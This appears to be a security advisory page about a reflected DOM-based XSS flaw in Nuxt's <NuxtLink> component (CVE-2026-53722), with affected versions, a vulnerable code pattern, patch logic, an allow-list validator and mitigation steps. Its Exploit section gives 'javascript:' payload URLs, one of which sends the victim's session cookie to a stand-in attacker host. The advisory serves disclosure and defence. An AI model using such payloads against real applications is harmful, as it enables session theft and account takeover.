Nuxt, Reflected XSS, CVE-2026-53722 (Medium) -DC-Jun2026-462


Nuxt is a popular open-source Vue.js framework used to build full-stack web applications. Prior to versions 3.21.7 and 4.4.7, the `<NuxtLink>` component contained a reflected DOM-based cross-site scripting (XSS) vulnerability due to improper validation of URL schemes.
The `<NuxtLink>` component accepts a `to` or `href` prop to define navigation targets. When an application binds user-controlled input—such as a query parameter, a CMS field, or a user-supplied profile URL—directly to `:to` or `:href`, an attacker can supply a `javascript:` or `vbscript:` URI. The component renders this value verbatim into the `href` attribute of the underlying `<a>` element without any sanitisation. When a victim clicks the link, the browser executes the script in the context of the application’s origin, leading to reflected DOM-based XSS.
A `data:text/html,…` payload does not execute in the application’s origin but enables a same‑tab phishing attack, displaying a fake login overlay or credential‑harvesting form while the victim remains on a legitimate application URL.
The vulnerability also affects the component’s custom slot, which exposes `href` and `route.href` props to consumers. Any application that re‑binds these values to its own anchor tags is equally vulnerable.
Unlike the previously reported `navigateTo` issue (CVE‑2024‑34343), the sink here is the rendered anchor itself. The existing `isScriptProtocol` checks in `navigateTo` and `reloadNuxtApp` are not on this code path. The `onClick` handler intentionally returns early for external links, leaving the browser’s native protocol‑based navigation to run.

Affected component:

DailyCVE Form

Platform: Nuxt
Version: 3.x < 3.21.7; 4.x from 4.0.0 up to (but not including) 4.4.7
Vulnerability: Reflected DOM-based XSS
Severity: Medium (CVSS 5.1)
Date: 2026-06-12
Prediction: Already patched – upgrade to 3.21.7 or 4.4.7

What Undercode Say

Analytics:

  • Affected versions: Nuxt 3.x before 3.21.7 and 4.x before 4.4.7.
  • Over 3,000 dependent packages.
  • Attack vector: Network (AV:N) with low attack complexity (AC:L) and no privileges required (PR:N); requires user interaction (UI:A).
  • Confidentiality and integrity impact: Low (VC:L / VI:L).

Bash commands to check your Nuxt version:

```bash
# Check installed Nuxt version
npm list nuxt
# Check version in package.json
grep '"nuxt"' package.json
# Print the declared Nuxt version so it can be compared against the vulnerable range
# (3.x < 3.21.7 or 4.x < 4.4.7)
node -e "const pkg = require('./package.json'); const v = pkg.dependencies?.nuxt || pkg.devDependencies?.nuxt; if (v) console.log('Nuxt version:', v);"
```

Code snippet – Vulnerable pattern:

```vue
<template>
  <!-- Attacker-controlled input bound directly to :to -->
  <NuxtLink :to="user.website">Visit profile</NuxtLink>
</template>

<script setup>
// useRoute and ref are auto-imported by Nuxt
const route = useRoute();
// user.website = "javascript:alert('XSS')" from query param or CMS
const user = ref({ website: route.query.url });
</script>
```

Code snippet – Patched behaviour (Nuxt 4.4.7 / 3.21.7):

```ts
// Simplified sanitisation logic applied before rendering.
// isScriptProtocol below is a simplified stand-in for the scheme check that
// navigateTo already uses; the schemes listed are the ones this advisory names.
const SCRIPT_SCHEME_RE = /^(?:javascript|vbscript|data):/i;
function isScriptProtocol(href: string): boolean {
  return SCRIPT_SCHEME_RE.test(href);
}

function sanitiseHref(href: string): string {
  // Strip control chars and whitespace (browsers ignore them inside a scheme)
  href = href.replace(/[\x00-\x1f\x20]+/g, '');
  // Unwrap leading view-source:
  if (href.startsWith('view-source:')) href = href.slice('view-source:'.length);
  // Reject script-capable schemes
  if (isScriptProtocol(href)) return '';
  return href;
}
```

Exploit

An attacker can inject a malicious URL via any user-controllable input that is later bound to `:to` or `:href`. Common injection points include:
- Query parameters: `https://victim.com/profile?url=javascript:alert(document.cookie)`
- CMS fields: a CMS-driven landing page that renders a `<NuxtLink>` whose target comes from a CMS field
- User-supplied profile links: marketplace or social platforms that display seller-supplied URLs
- "Share this" / "Open in new tab" handlers that pass through a query parameter

Example attack:
1. Attacker crafts a link: `https://victim.com/dashboard?redirect=javascript:fetch('https://attacker.com/steal?cookie='%2bdocument.cookie)`
2. Victim clicks the rendered `<NuxtLink>`.
3. The `javascript:` URI executes in the victim’s browser, sending their session cookie to the attacker’s server.

For `data:text/html,…`, the attacker can display a fake login form within the legitimate application’s tab, harvesting credentials.
Protection

Immediate actions:
- Upgrade to Nuxt 3.21.7 or 4.4.7 immediately.
- If you cannot upgrade immediately, validate all URLs before binding them to `<NuxtLink>`:
  - Only accept paths that start with `/` (and not `//`).
  - Run user-supplied URLs through `new URL(value)` and reject anything whose `protocol` is not in an allow-list (typically `http:` and `https:`).
- Avoid binding raw user input to `to` or `href` props without sanitisation.
- Use Content Security Policy (CSP) to restrict script execution from `javascript:` URIs (though this is a defence-in-depth measure, not a complete fix).
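The allow-list validation described above, as an added example written for this page rather than taken from Nuxt: `safeLinkTarget` and `SAFE_PROTOCOLS` are assumed names, and the `<NuxtLink>` usage in the trailing comment is hypothetical. It goes one step beyond the list above by also rejecting `/\host`, which the browser resolves like `//host`.

```javascript
// Added example, not Nuxt's own code: allow-list validation for a
// user-supplied link target before it is bound to <NuxtLink :to> or :href.
// Returns a safe target, or `fallback` when the value is rejected.
const SAFE_PROTOCOLS = new Set(['http:', 'https:']);

function safeLinkTarget(value, fallback = '/') {
  if (typeof value !== 'string') return fallback;

  // Remove ASCII control characters and spaces anywhere in the value: the
  // URL parser tolerates them inside a scheme, so "java\tscript:" still runs.
  const cleaned = value.replace(/[\x00-\x20]+/g, '');
  if (cleaned === '') return fallback;

  // Same-origin path: accept "/path" but not protocol-relative "//host/...".
  // A backslash in second position ("/\host") is resolved by browsers exactly
  // like "//host" for http(s) URLs, so it is rejected as well.
  if (cleaned.startsWith('/')) {
    return /^\/[\/\\]/.test(cleaned) ? fallback : cleaned;
  }

  // Absolute URL: let the WHATWG parser determine the scheme (it lowercases
  // "JaVaScRiPt:" and reports "view-source:javascript:..." as view-source:),
  // then compare against the allow-list. Unparsable values are rejected too.
  let parsed;
  try {
    parsed = new URL(cleaned);
  } catch {
    return fallback;
  }
  return SAFE_PROTOCOLS.has(parsed.protocol) ? parsed.href : fallback;
}

// Hypothetical usage in a component:
//   <NuxtLink :to="safeLinkTarget(route.query.url)">Visit profile</NuxtLink>
```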

Patch details:

  • The fix strips control characters and whitespace, unwraps `view-source:` prefixes, and replaces any remaining script‑capable scheme with an empty string.
  • The sanitisation is applied to the resolved external `href` before it is passed to the rendered `<a>` element or the custom slot.

Impact

  • Session theft: Attackers can steal non‑HttpOnly cookies, gaining access to user sessions.
  • CSRF token theft: CSRF tokens can be exfiltrated, enabling cross‑site request forgery.
  • Account takeover: DOM rewriting allows the attacker to modify the page content and redirect users to attacker‑controlled endpoints.
  • Credential harvesting: Fake login overlays can be injected to capture usernames and passwords.
  • Phishing: `data:text/html,…` payloads enable same‑tab phishing attacks anchored to a legitimate application URL, increasing the credibility of the attack.
Any Nuxt application that binds user-controlled values to `<NuxtLink>` or `:href` is vulnerable, including profile-link rendering, “share this” handlers, CMS-driven landing pages, and marketplace listings.

Sources:

Reported By: github.com